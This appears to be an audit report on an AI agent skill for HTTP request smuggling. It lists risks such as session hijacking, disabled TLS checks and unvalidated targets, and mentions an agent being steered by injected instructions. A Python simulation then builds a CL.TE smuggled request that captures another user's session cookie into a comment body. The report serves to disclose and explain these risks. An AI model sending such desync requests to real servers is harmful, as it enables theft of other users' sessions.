exploiting-http-request-smuggling

Warn

Audited by Gen Agent Trust Hub on Apr 6, 2026

Risk Level: MEDIUM
Findings: EXTERNAL_DOWNLOADS, DATA_EXFILTRATION, COMMAND_EXECUTION
Full Analysis
  • [EXTERNAL_DOWNLOADS]: The skill instructs the agent to clone external code repositories from third-party sources, specifically github.com/defparam/smuggler.git and github.com/BishopFox/h2cSmuggler.git. These sources are not included in the verified trusted organizations list.
  • [DATA_EXFILTRATION]: The documentation in SKILL.md gives explicit instructions for session hijacking. 'Attack 2' describes capturing other users' requests, including their session cookies and Authorization headers, by smuggling a partial request whose declared body length exceeds the bytes actually sent; the back-end completes that body with the next user's request, so their headers land in a field the attacker can read back, such as a comment body.
  • [COMMAND_EXECUTION]: The provided scripts/agent.py performs low-level network operations over raw sockets, bypassing a standard HTTP client's parsing and header normalisation. The script also explicitly disables TLS certificate verification (ssl.CERT_NONE), a best-practice violation that leaves the tool's own connection to the target open to man-in-the-middle interception.
  • [INDIRECT_PROMPT_INJECTION]: The skill has a data ingestion point where user-supplied URLs are processed by agent.py. The URL is used directly in network operations (raw socket writes and HTTP requests) in the identify_architecture and run_assessment functions. Beyond basic parsing there is no strict validation of the host, so an agent that is steered toward a malicious or internal target, for example by injected instructions, will direct its attack traffic there.
  • [METADATA_POISONING]: There is a discrepancy in the skill's attribution, as the YAML frontmatter identifies the author as 'mahipal' while the LICENSE file attributes the work to 'mukul975'.
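To make the mechanism behind the DATA_EXFILTRATION finding concrete, the following is an added example; it is not code from the audited skill nor from the smuggler or h2cSmuggler repositories. It simulates a CL.TE desync: a front-end that honours Content-Length forwards the attacker's request as one unit, while a back-end that honours Transfer-Encoding: chunked sees a second, deliberately incomplete POST to a comment endpoint and waits for more bytes; the next user's request on that back-end connection completes the body. The host target.example, the /post/comment path and the cookie value are constructed placeholders, and the two parsers stand in for the front-end and back-end rather than any real server.

```python
# Added example (not the audited skill's code): simulate the CL.TE desync
# behind the 'Attack 2' session-capture technique. Host, path and the cookie
# value are constructed placeholders.
from typing import Dict, List, Tuple

CRLF = b"\r\n"
Request = Tuple[bytes, bytes]  # (request line, body)


def parse_headers(buf: bytes) -> Tuple[bytes, Dict[bytes, bytes], int]:
    """Return (request line, lower-cased headers, offset where the body starts)."""
    end = buf.find(CRLF + CRLF)
    if end == -1:
        raise ValueError("incomplete headers")
    lines = buf[:end].split(CRLF)
    headers: Dict[bytes, bytes] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, end + 4


def split_by_content_length(buf: bytes) -> List[Request]:
    """Front-end behaviour: Content-Length wins, Transfer-Encoding is ignored."""
    reqs: List[Request] = []
    pos = 0
    while pos < len(buf):
        line, headers, body_start = parse_headers(buf[pos:])
        clen = int(headers.get(b"content-length", b"0"))
        start = pos + body_start
        reqs.append((line, buf[start:start + clen]))
        pos = start + clen
    return reqs


def split_by_chunked(buf: bytes) -> Tuple[List[Request], bytes]:
    """Back-end behaviour: Transfer-Encoding: chunked wins.
    Returns the complete requests found plus the bytes of a request the
    back-end is still waiting to finish (empty if none)."""
    reqs: List[Request] = []
    pos = 0
    while pos < len(buf):
        try:
            line, headers, body_start = parse_headers(buf[pos:])
        except ValueError:
            return reqs, buf[pos:]
        p = pos + body_start
        if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
            body = b""
            while True:
                nl = buf.find(CRLF, p)
                if nl == -1:
                    return reqs, buf[pos:]   # chunk stream cut short
                size = int(buf[p:nl], 16)
                p = nl + 2
                if size == 0:
                    p += 2                   # CRLF after the terminating zero chunk
                    break
                body += buf[p:p + size]
                p += size + 2                # chunk data plus its trailing CRLF
        else:
            clen = int(headers.get(b"content-length", b"0"))
            if len(buf) - p < clen:
                return reqs, buf[pos:]       # partial request: keep waiting
            body = buf[p:p + clen]
            p += clen
        reqs.append((line, body))
        pos = p
    return reqs, b""


def build_attacker_request(smuggled_content_length: int) -> bytes:
    """Outer POST whose chunked body ends at once; the bytes after the zero
    chunk are the smuggled prefix the back-end treats as a new request."""
    smuggled = (
        b"POST /post/comment HTTP/1.1" + CRLF
        + b"Host: target.example" + CRLF
        + b"Content-Type: application/x-www-form-urlencoded" + CRLF
        + b"Content-Length: %d" % smuggled_content_length + CRLF
        + CRLF
        + b"comment="   # deliberately shorter than the declared length
    )
    body = b"0" + CRLF + CRLF + smuggled
    return (
        b"POST / HTTP/1.1" + CRLF
        + b"Host: target.example" + CRLF
        + b"Content-Length: %d" % len(body) + CRLF
        + b"Transfer-Encoding: chunked" + CRLF
        + CRLF
        + body
    )


VICTIM_REQUEST = (   # constructed sample of the next user's request
    b"GET /account HTTP/1.1" + CRLF
    + b"Host: target.example" + CRLF
    + b"Cookie: session=VICTIM-SESSION-TOKEN" + CRLF
    + CRLF
)


def simulate(attacker: bytes, victim: bytes):
    """Return what each side sees before and after the victim's request arrives."""
    frontend = split_by_content_length(attacker)            # one request, forwarded whole
    done, pending = split_by_chunked(attacker)              # back-end: one done, one waiting
    done_after, left = split_by_chunked(pending + victim)   # victim's bytes complete it
    return frontend, done, pending, done_after, left


if __name__ == "__main__":
    # A real attacker does not know the victim's size: the declared length must
    # cover the headers of interest yet be satisfied by a typical request, or the
    # back-end waits until it times out. Here it is computed for determinism.
    n = len(b"comment=") + len(VICTIM_REQUEST)
    fe, done, pending, after, left = simulate(build_attacker_request(n), VICTIM_REQUEST)
    print("front-end saw %d request(s)" % len(fe))
    print("back-end finished %d, waiting on %d bytes" % (len(done), len(pending)))
    print("comment body after the victim's request arrived:", after[0][1])
```

The point to check in the output is the last line: the comment body begins with `comment=GET /account HTTP/1.1` and contains the victim's Cookie header, which is exactly the data the audited skill's 'Attack 2' aims to read back from a public field.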
Audit Metadata
Risk Level: MEDIUM
Analyzed: Apr 6, 2026, 11:54 AM